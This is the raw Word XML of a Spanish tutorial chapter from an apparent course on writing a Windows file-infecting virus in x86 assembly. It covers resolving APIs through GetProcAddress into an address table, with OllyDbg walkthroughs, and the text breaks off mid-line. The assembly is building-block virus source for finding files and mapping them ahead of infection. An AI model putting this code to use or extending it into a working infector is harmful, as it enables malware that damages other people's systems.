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Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Capítulo 8</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Obteniendo las API’s necesarias - parte 3 (y final)</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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esto de obtener las APIs se está haciendo largo, pero quiero ir despacio para que se entienda todo bien. De todas formas en este capítulo vamos a terminar con este tema, así nos podemos meter de lleno en la infección de archiv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 el capítulo anterior obtuvimos la API mágica: GetProcAddress, ahora la vamos a usar para encontrar el resto de las funciones necesari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nuestro ejemplo vamos a utilizar solamente APIs de la librería Kernel32.dll, de todas formas si quisiéramos utilizar funciones de otra librería lo que tendríamos que hacer es obtener primeramente la API GetModuleHandleA, con la cual obtendremos la dirección de cualquier dll que necesitemos. Un ejemplo de esto sería para la librería user32.dll si queremos crear un payload que muestre un mensaje con MessageBoxA en algún momento determin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Nota: un payload es algo así como el efecto extra que se le agrega a un virus, que puede no existir (como en nuestro caso), ser un mensaje que se despliega en ciertas oportunidades, la eliminación de algunos archivos del disco infectado, y un largo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 bien no vamos a incluir nada de esto en nuestro virus, vamos a ver un ejemplo de cómo se haría para que quede bien cla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mero deberíamos definir dos variables dentro de nuestro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zGetModuleH </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>db "GetModuleHandleA", 0</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zUser32         </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>db "user32.dll", 0</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Luego utilizaríamos la API GetProcAddress para encontrar la dirección de la otra función que vamos a necesitar: GetModuleHandleA. Esto se hace con este código:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---------------------------------------------------------------------------------------------------</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lea</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi, [ebp + offset zGetModuleH]</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push</w:t>
        <w:tab/>
        <w:t xml:space="preserve">esi    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push</w:t>
        <w:tab/>
        <w:t>[ebp + offset MZkernel]                 ; empujo la direccion del kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>[ebp + offset GetPAddress]            ; llamo a GetProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Esto me va a dejar en el registro eax la dirección de memoria de GetModuleHandleA, la cual utilizaremos para encontrar la dirección base de memoria de la librería user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ego hacem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a</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi, [ebp + offset zUser3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sh</w:t>
        <w:tab/>
        <w:t xml:space="preserve">esi    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>call</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>eax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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o que hacemos acá es empujar en la pila el nombre de la librería que estamos buscando (“user32.dll”), que ya teníamos definida en la sección de datos de nuestro virus, luego hacemos un call a eax, recordemos que en eax teníamos la dirección de GetModuleHandleA ( o sea que es como si hiciéramos “call GetModuleHandleA” en un programa norm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amos todo esto con el OllyDbg para ver como funciona. Compilemos nuestro programa y veámoslo en Ollyd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671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467100" cy="1038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primer parte lo que hace es conseguir la dirección de la API GetModuleHandleA, para comprobar esto ejecutemos esta sección de código y veamos el registro e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276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276475" cy="904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mos que el Ollydbg reconoce la dirección que queda allí cargada, que es justamente la API que estábamos buscando. Luego ejecutamos las tres líneas siguientes y vemos nuevamente el registro ea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8383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1838325" cy="8477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emos que tenemos la dirección base de la librería que buscábamos, comprobémoslo en memoria, vayamos a ‘Show Memory window’ (M) y buscamos la dirección que nos indica el registro eax (77D10000 en este caso, pero puede variar en otras P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0383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038350" cy="8572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o, ya tenemos la dirección para pasarle a GetProcAddress y obtener la dirección de MessageBoxA por ejemplo. Esto sería a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mero definimos un string con el nombre de la función que vamos a busc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MessageBox</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>db "MessageBoxA", 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Luego llamamos a GetProcAddress, pero ahora le pasamos la dirección base de user32.dll en vez de kernel32:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---------------------------------------------------------------------------------------------------</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lea</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi, [ebp + offset zMessageBox]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push</w:t>
        <w:tab/>
        <w:t xml:space="preserve">esi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ush</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eax       </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>call</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">[ebp + offset GetPAddress]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 este mecanismo podremos obtener todas las APIs que necesite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ahora continuemos con nuestro objetivo, que era hacer una rutina para obtener las API’s que vamos a utilizar, recordemos que solo usaremos la librería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mo en el ejemplo anterior podríamos ir obteniéndolas una a una, pero lo vamos a hacer un poco mas eficiente, para esto vamos a crear dos estructuras, una que contenga los nombres de las APIs que necesitamos y otra que guarde las direcciones de las mism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esto debemos declarar en la sección de datos de nuestro virus lo siguien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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">zAPIs           </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>db "FindFirstFileA",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FindNextFileA",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CreateFileA",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CreateFileMappingA",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MapViewOfFile",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CloseHandle",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UnmapViewOfFile",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ab/>
        <w:tab/>
        <w:t>db 0</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FindFirst      </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>dd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FindNext       </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>dd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CreateFile     </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>dd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CreateFileM    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>dd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MapViewOfFile  </w:t>
        <w:tab/>
        <w:t>dd 0</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 xml:space="preserve">zCloseHandle    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>dd 0</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zUViewOfFile    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>dd 0</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En la primer parte lo que hacemos es crear una etiqueta (zAPIs) para luego poder referenciar donde comienzan las cadenas de texto de las funciones que vamos a buscar, como cada una mide 32 bits (dd), la próxima la vamos a encontrar 32 lugares mas allá (04h bytes), por eso no hace falta ponerle una etiqueta delante de cada u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la segunda estructura colocamos tantas etiquetas como APIs vamos a necesitar, el nombre es arbitrario, y pueden utilizar el que quieran, lo único a tener en cuenta es ordenarlas de la misma forma que las cadenas de texto declaradas anterior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seguir con el código ordenado vamos a crear una subrutina que obtenga las API’s que llamamos de la siguiente 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call    obtenerAPIs</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desarrollemos este procedimiento, para esto copiemos el siguiente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obtenerAPIs proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lea</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi, [ebp + offset zAPIs]             ; inicio de la tabla de nombres de las API's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">lea </w:t>
        <w:tab/>
        <w:t xml:space="preserve">edi, [ebp + offset zFindFirst]       ; inicio de la tabla de direcciones </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dec</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>e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tieneAPI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inc</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK2"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK1"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push</w:t>
        <w:tab/>
        <w:t>esi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>push</w:t>
        <w:tab/>
        <w:t>[ebp + offset MZkernel]               ; direccion del kernel32.dll</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call</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>[ebp + offset GetPAddress]          ; llamo a GetProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK2"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov</w:t>
        <w:tab/>
        <w:t>[edi], dword ptr eax                     ; guarda la direccion obtenida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>add</w:t>
        <w:tab/>
        <w:t>edi, 04h                                      ; direccion de la proxima AP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buscaSiguiente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inc</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cmp</w:t>
        <w:tab/>
        <w:t>byte ptr [esi], 0h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jne</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>buscaSiguien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cmp</w:t>
        <w:tab/>
        <w:t>byte ptr [esi + 1], 0h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jne</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>obtieneAP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tenerAPIs endp</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amos esto un poco más en det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a</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi, [ebp + offset zAP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Acá utilizamos la instrucción lea, esta instrucción lo que hace es cargar la dirección de inicio donde tenemos guardados los nombres de las funciones que vamos a busc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ego hacemos:</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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">lea </w:t>
        <w:tab/>
        <w:t>edi, [ebp + offset zFindFirs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Para que edi quede apuntando al lugar donde vamos a guardar las direcciones de las API’s que vamos encontran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uego empujamos en la pila los argumentos para poder llamar a GetProcAddres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la dirección donde está guardado el string con el nombre de la función buscada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>la dirección de la librería que la contiene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 por último llamamos a GetProcAddress, la cual nos devuelve en el registro eax la dirección de memoria de la función buscada, y guardamos esa dirección para poder accederla lueg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cordemos que edi apuntaba a los nombres de las variables que vamos a usar para accederlas (zFindFirst, zFindNext, etc.).</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Las próximas dos líneas lo que hacen es guardar el valor obtenido en eax en las variables que teníamos declaradas, e incrementamos nuestro puntero (edi) para que quede apuntando a la dirección de memoria de la próxima fun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w:t>
        <w:tab/>
        <w:t>[edi], dword ptr eax                     ; guarda la direccion obtenida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>add</w:t>
        <w:tab/>
        <w:t>edi, 04h                                      ; direccion de la proxima AP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sigue es para buscar el inicio del próximo string que identifica la función buscada, lo que hace es ir incrementando de a un byte y ver si es cero, en cuyo caso indicaría que termina una cadena y comienza la próxi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scaSiguiente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inc</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>esi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cmp</w:t>
        <w:tab/>
        <w:t>byte ptr [esi], 0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jne </w:t>
        <w:tab/>
        <w:t>buscaSiguie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hora, ¿cómo sabemos si ya hemos encontrado todas las API’s buscadas y tenemos que salir de nuestra subru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esto veamos que cuando definimos los string de búsquedas con los nombres de las funciones, al final agregábamos un cero extra:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="2832"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2124" w:firstLine="708"/>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db "UnmapViewOfFile", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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db </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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sea que simplemente para determinar si ya terminamos debemos ver si tenemos dos ceros seguidos, como ya habíamos detectado un cero, lo que hacemos es buscar el próximo byte (esi + 1) para ver si también es cero:</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cmp</w:t>
        <w:tab/>
        <w:t>byte ptr [esi + 1], 0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ne</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>obtieneAP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que hace es preguntar si estamos apuntando a un cero, si no es así volvemos para buscar otra función, sino salimos de esta ru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 seguimos esto con Ollydbg se nos puede aclarar un poco más. Compilemos nuestro virus y abrámoslo en Ollydb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1884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418840" cy="838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mos que tenemos primeramente el cálculo del Delta Offset, y luego las tres subrutinas que hemos declarado. Como la que nos interesa es la tercera, pasamos las primeras con F8 y entramos en la última con F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42836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3428365" cy="13049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cá vemos la rutina completa, es muy sencilla, vea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cutemos hasta el CALL, que es en realidad un call a GetProcAddress. Vemos que antes empujamos en el stack el string “FindFirstFileA” y la dirección del kernel32.d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193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4" r="-15" b="-64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2419350" cy="561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ego de llamar a GetProcAddress nos queda en eax la dirección de esta AP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1336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68" r="-17" b="-68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2133600" cy="533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uego guardamos el valor obtenido y buscamos la siguiente función. Así hasta completar todas las que necesitemos. Esto es muy cómodo, por que si necesitamos una función que no habíamos tenido en cuenta desde el principio, solamente la agregamos en la sección de datos y listo, esta rutina se va a encargar de obtener su dire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estas API’s obtenidas luego las podemos llamar fácilmente de la siguiente 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ll</w:t>
        <w:tab/>
        <w:tab/>
